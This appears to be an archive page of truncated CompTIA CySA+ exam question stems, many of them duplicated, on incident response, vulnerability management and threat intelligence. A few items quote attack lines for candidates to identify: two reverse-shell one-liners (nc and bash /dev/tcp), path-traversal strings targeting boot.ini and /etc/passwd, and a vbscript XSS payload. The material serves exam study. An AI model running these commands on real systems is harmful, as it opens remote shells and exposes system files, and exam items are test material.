اضغط هنا للانضمام الى قروب فوجي للإختبارات على تيليقرام

أرشيف أسئلة الاختبار

اختبار شهادة محلل الأمن السيبراني CompTIA CySA+

هذه الصفحة مخصصة للأرشفة وتعرض جميع أسئلة الاختبار وروابط كل سؤال مع الخيارات والنقاشات.

الأسئلة

1040 سؤال
  1. A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabi ...
  2. An analyst is reviewing system logs while threat hunting Which of the following hosts should be investigated first?
  3. Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
  4. A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
  5. Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what ...
  6. A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
  7. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
  8. Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Whic ...
  9. During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
  10. A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
  11. A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the ...
  12. An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utili ...
  13. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
  14. Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
  15. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
  16. An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Whic ...
  17. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
  18. A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environm ...
  19. The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company. Which of the ...
  20. A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of ...
  21. Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
  22. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
  23. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  24. Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of ...
  25. A company has decided to expose several systems to the internet, the systems are currently available internally only. A security analyst is using a subset of C ...
  26. Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
  27. A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
  28. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
  29. During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
  30. A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
  31. A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the ...
  32. An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utili ...
  33. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
  34. Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
  35. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
  36. An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Wh ...
  37. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
  38. A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public ...
  39. Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
  40. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
  41. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  42. Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of ...
  43. A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Which of the following vulnerability scannin ...
  44. An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party t ...
  45. After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is ...
  46. An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following i ...
  47. A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that ...
  48. A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incide ...
  49. An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server ...
  50. A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise wor ...
  51. While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
  52. Which of the following is the best reason to implement an MOU?
  53. An organization's security operations team has been experiencing issues with fake news events about potential cyberattacks that could impact the organization' ...
  54. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analys ...
  55. A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?
  56. An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategi ...
  57. Which of the following evidence collection methods is most likely to be acceptable in court cases?
  58. Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
  59. An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the mos ...
  60. Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
  61. Which of the following is the primary purpose for classifying data?
  62. Which of the following is the best reason for developing the organization's communication plans?
  63. Which of the following is the most likely scenario occurring with the time stamps?
  64. Which of the following could help the analyst reduce the number of alarms with the least effort?
  65. An end-of-life date was announced for a widely used 0S. A business-critical function is performed by some machinery that is controlled by a PC, which is util ...
  66. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
  67. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
  68. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
  69. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?
  70. Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
  71. Which of the following is a commonly used four-component framework to communicate threat actor behavior?
  72. An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Whi ...
  73. A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techn ...
  74. A security analyst detected the following suspicious activity: bash Copy code rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > /tm ...
  75. A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
  76. A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
  77. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
  78. During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
  79. A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
  80. Which of the following could help the analyst reduce the number of alarms with the least effort?
  81. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
  82. Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
  83. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
  84. A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
  85. A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of the ...
  86. A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: • Must use minimal network bandwidth • Mu ...
  87. Which of the following vulnerability scanning methods should be used to best meet these requirements?
  88. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?
  89. A system that provides the user interface for a critical server has potentially been corrupted by malware. Which of the following is the best recommendation t ...
  90. A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incide ...
  91. During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the mo ...
  92. An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Wh ...
  93. Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to tri ...
  94. A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
  95. A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of the ...
  96. A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The pr ...
  97. A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which o ...
  98. An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from t ...
  99. An analyst receives an alert from the EDR indicating a user has downloaded a malicious file that is attempting to compromise the laptop. The analyst gathers t ...
  100. The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Vulnerabili ...
  101. A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the enviro ...
  102. Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Wh ...
  103. Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes wh ...
  104. Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastru ...
  105. A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnera ...
  106. A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
  107. Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
  108. Which of the following responsibilities does the legal team have during an incident management event? (Select two).
  109. Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
  110. To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing in emergency ...
  111. A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instan ...
  112. When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity a ...
  113. A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Wh ...
  114. The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help wi ...
  115. A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
  116. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
  117. A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. ...
  118. The SOC received a threat intelligence notification indicating that an employee’s credentials were found on the dark web. The user’s web and login activities we ...
  119. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
  120. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
  121. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
  122. Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
  123. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
  124. A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
  125. A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
  126. A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
  127. A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
  128. Law enforcement subpoenas a company in order to obtain all records related to the activities a threat actor performed using the IP address 154.21.154.21. Which ...
  129. Which of the following risk management decisions should be considered after evaluating all other options?
  130. A user clicks on a malicious adware link, and the malware successfully downloads to the machine. The malware has a script that invokes command-and-control activ ...
  131. A security analyst is investigating an unusually high volume of requests received on a web server. Based on the following command and output: Which of the fo ...
  132. Which of the following is a nation-state actor least likely to be concerned with?
  133. When undertaking a cloud migration of multiple SaaS applications ، an organization’s systems administrators struggled with the complexity of extending identity ...
  134. A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
  135. Using open-source intelligence gathered from technical forum a threat actor compiles and tests a malicious downloader to ensure that it will not be detected by ...
  136. An organization’s Chief Information Security Officer (CISO) is organizing a tabletop drill. The CISO has included several other executives in the meeting invita ...
  137. Which of the following is the best reason to implement an MOU?
  138. Which of the following is a circumstance in which a security operations manager would most likely consider using automation?
  139. Security analysts can review the Windows Registry on endpoints to get insights into:
  140. A security analyst is reviewing the logs after getting an alert. At which of the following stages of the incident response process should the analyst establish ...
  141. Which of the following best explains the importance of communicating unusual alert findings?
  142. The website of a large retail chain is failing to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is t ...
  143. A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
  144. The security team is reviewing a list of vulnerabilities present on the environment, and they want to prioritize the remediation based on the CVSS v4.0 metrics: ...
  145. An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
  146. A cybersecurity analyst is helping systems engineers investigate a Windows server that experienced a sudden reduction in available drive space. The analyst revi ...
  147. Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
  148. An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been disco ...
  149. A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runs a scan t ...
  150. After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following ...
  151. Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
  152. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
  153. A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to ...
  154. A user forwards an email with an attachment to the SOC asking if it is safe to open. Which of the following tasks should a SOC analyst perform? (Select two)
  155. An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of ...
  156. Which of the following is the best strategy for prioritizing vulnerabilities for remediation?
  157. A threat intelligence analyst needs to gather TTPs from attackers. Which of the following is the most comprehensive resource for this task?
  158. A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
  159. A security analyst is working on a suspicious email forwarded from a user. The email contains an attachment asking the user to open it. Which of the following s ...
  160. A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
  161. A SOC has SIEM configured to receive threat intelligence feeds from multiple external sources. For certain tasks, there is no need for human interaction. Which ...
  162. A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improv ...
  163. A security analyst discovers multiple log entries from a recently acquired tool that was bundled as a YUM package. Those entries point to attempts of privilege ...
  164. An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: Captures live mem ...
  165. A security analyst is comparing the results of the past and current active credentialed vulnerability scans: Which of the following should the analyst do nex ...
  166. A vulnerability analyst is writing a report documenting the newest, most critical exposure risks identified in the past month. Which of the following public MIT ...
  167. Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and impr ...
  168. An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
  169. Joe, a leading salesperson at an organization, has announced on social media that they are leaving their current role to start a new company that will compete w ...
  170. Which of the following entities should an incident manager work with to ensure that correct processes are adhered to when communicating incident reporting to th ...
  171. A security analyst receives the following information about the company’s systems. They need to prioritize which systems should be given the resources to improv ...
  172. A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
  173. The DevSecOps team is remediating an SSRF issue on the company’s public-facing website. Which of the following is the best mitigation technique to address this ...
  174. Which of the following best explains the reason system hardening is essential for servers?
  175. A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
  176. A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
  177. A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
  178. Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
  179. An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: Captures live mem ...
  180. A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
  181. An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
  182. A critical server hosting final exams for an educational institution fails while students are taking their exams. The final exam deadline is in 16 hours. Which ...
  183. While performing a dynamic analysis of a malicious file, a security analyst notices that the memory address changes every time the process runs. Which of the fo ...
  184. Which of the following best describes root cause analysis?
  185. A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident ...
  186. A security analyst is scanning an ICS host (192.168.1.5) in an industrial plant for insecure ports while minimizing the impact to uptime or performance. Which o ...
  187. Which of the following best explains the importance of playbooks for incident response teams?
  188. Which of the following is the best option for an IT administrator to deploy to ensure standardized permissions to a cloud environment?
  189. After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The ...
  190. Which of the following most accurately describes the Cyber Kill Chain methodology?
  191. Which of the following best describes the benefit of implementing a PAM solution?
  192. A security analyst is handling vulnerability management tasks and reviewing the following output from Recon-ng's Shodan-IP module. Which of the following are th ...
  193. Which of the following uses simulated traffic to a website to evaluate performance?
  194. Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
  195. Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of ...
  196. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
  197. Which of the following statements best describes the MITRE ATT&CK framework?
  198. A penetration tester crashes a web application by entering a 15-digit value in the postal code field on the user registration form. Which of the following contr ...
  199. A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential info ...
  200. A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instan ...
  201. A security analyst finds that two file servers generated alerts about shadow copies that were deleted by a script that was run from a temporary directory and de ...
  202. A security analyst identifies a device on which different malware was detected multiple times even after the systems were scanned and cleaned several times. Whi ...
  203. Which of the following is a reason why a SOC team member might spend extra time on a routine incident prior to closing it?
  204. A company suspects a coordinated effort to attack their platform. Web server logs show malicious activity from many different source IP addresses located in dif ...
  205. A security analyst is performing a malware analysis on a device and receives the following instructions: Reduce the blast radius of the potential threat. Pres ...
  206. A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The sec ...
  207. A DevOps analyst implements a webhook to trigger code vulnerability scanning for submissions to the repository. Which of the following is the primary benefit of ...
  208. During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
  209. During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
  210. The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
  211. Which of the following best explains the importance of communicating unusual alert findings?
  212. A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
  213. A security analyst is identifying vulnerabilities in laptops. Users often take their laptops out of the office while traveling, and the vulnerability scan metri ...
  214. A Chief Information Security Officer (CISO) has decided the cost to protect an asset is greater than the cost of losing the asset. Which of the following risk m ...
  215. A SOC manager is looking for a solution that can improve the response time and execute predetermined instructions. Which of the following is the best solution b ...
  216. Which of the following features is a key component of Zero Trust architecture?
  217. Which of the following best explains the importance of effective customer communication during a data breach?
  218. A threat intelligence analyst detects the following: Abuse elevation control mechanism Bypass user access control To which of the following components of a M ...
  219. While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
  220. An organization discovers unauthorized outbound network connections from a local, internal server to a remote server. A systems administrator compares the hash ...
  221. An organization has tracked several incidents that are listed in the following table. Which of the following is the organization’s MTTD?
  222. A security analyst receives the following information about the company’s systems. They need to prioritize which systems should be given the resources to improv ...
  223. A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnera ...
  224. A security analyst is prioritizing vulnerabilities that were identified in a recent scan of the company’s systems. Given the following data: Which of the follo ...
  225. A threat hunter seeks to identify new persistence mechanisms installed in an organization’s environment. In collecting scheduled tasks from all enterprise works ...
  226. An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendatio ...
  227. A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the follo ...
  228. The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO ...
  229. A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of ...
  230. A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data ...
  231. A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the f ...
  232. Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the env ...
  233. During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed ...
  234. After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non ...
  235. Which of the following would likely be used to update a dashboard that integrates data from multiple sources in real time?
  236. An analyst receives an alert for suspicious IIS log activity and reviews the following entries: '2024-05-23 15:57:05 10.203.10.16 HEAT / - 80 - 10.203.10.17 Dir ...
  237. A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees u ...
  238. Which of the following will most likely cause severe issues with authentication and logging?
  239. During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds ...
  240. The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of a ...
  241. A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the followi ...
  242. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
  243. An analyst is conducting monitoring against an authorized team that will perform adversarial techniques. The analyst interacts with the team twice per day to se ...
  244. A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
  245. Which of the following best explains the importance of network microsegmentation as part of a Zero Trust architecture?
  246. A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
  247. A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
  248. A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
  249. An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
  250. An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence ...
  251. While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
  252. A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. ...
  253. An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stre ...
  254. A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
  255. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgr ...
  256. A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could ...
  257. An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed U ...
  258. Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known source ...
  259. A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the followin ...
  260. An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which ...
  261. A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: - Must use minimal network bandwidth - Must use ...
  262. A vulnerability scan shows the following issues: - Workstations: CVSS Score 6.5, RDP vulnerability - Storage Server: CVSS Score 9.0, Unauthorized access due to ...
  263. A security analyst reviews a packet capture and identifies the following output as anomalous: ``` 13:49:57.553161 IP 10.203.10.17.45701 > 10.203.10.22.12930: Fl ...
  264. A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of th ...
  265. Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
  266. Which of the following would help to minimize human engagement and aid in process improvement in security operations?
  267. A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnorma ...
  268. Which of the following documents sets requirements and metrics for a third-party response during an event?
  269. Which of the following is a KPI that is used to monitor or report on the effectiveness of an incident response reporting and communication program?
  270. During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
  271. An organization is planning to adopt a zero-trust architecture. Which of the following is most aligned with this approach?
  272. A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach t ...
  273. A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the followi ...
  274. An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizi ...
  275. Which of the following explains the importance of a timeline when providing an incident response report?
  276. An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
  277. Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
  278. Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
  279. Which of the following threat actors is most likely to target a company due to its questionable environmental policies?
  280. A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The c ...
  281. An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
  282. An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best descr ...
  283. A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then conclude ...
  284. The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best a ...
  285. A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
  286. An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is th ...
  287. An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the sy ...
  288. A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the ri ...
  289. A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
  290. During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a ...
  291. A security analyst identifies a device on which different malware was detected multiple times, even after the systems were scanned and cleaned several times. Wh ...
  292. During normal security monitoring activities, the following activity was observed: cd C:\Users\Documents\HR\Employees takeown /f .* SUCCESS: Which of the follow ...
  293. A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scr ...
  294. A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the ...
  295. A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
  296. Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
  297. A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago but the report did not have a follow-up r ...
  298. An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the ...
  299. The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help wi ...
  300. An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
  301. Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
  302. While reviewing web server logs, a security analyst found the following line: < IMG SRC=' vbscript : msgbox("test")' > Which of the following malicious ...
  303. An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large ...
  304. A security analyst noticed the following entry on a web server log: Warning: fopen (ht tp://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var ...
  305. A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web inter ...
  306. A cybersecurity analyst is recording the following details: * ID * Name * Description * Classification of information * Responsible party In which of the follow ...
  307. In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from t ...
  308. Which of the following should be updated after a lessons-learned review?
  309. A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
  310. A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is th ...
  311. An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host sec ...
  312. An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that ...
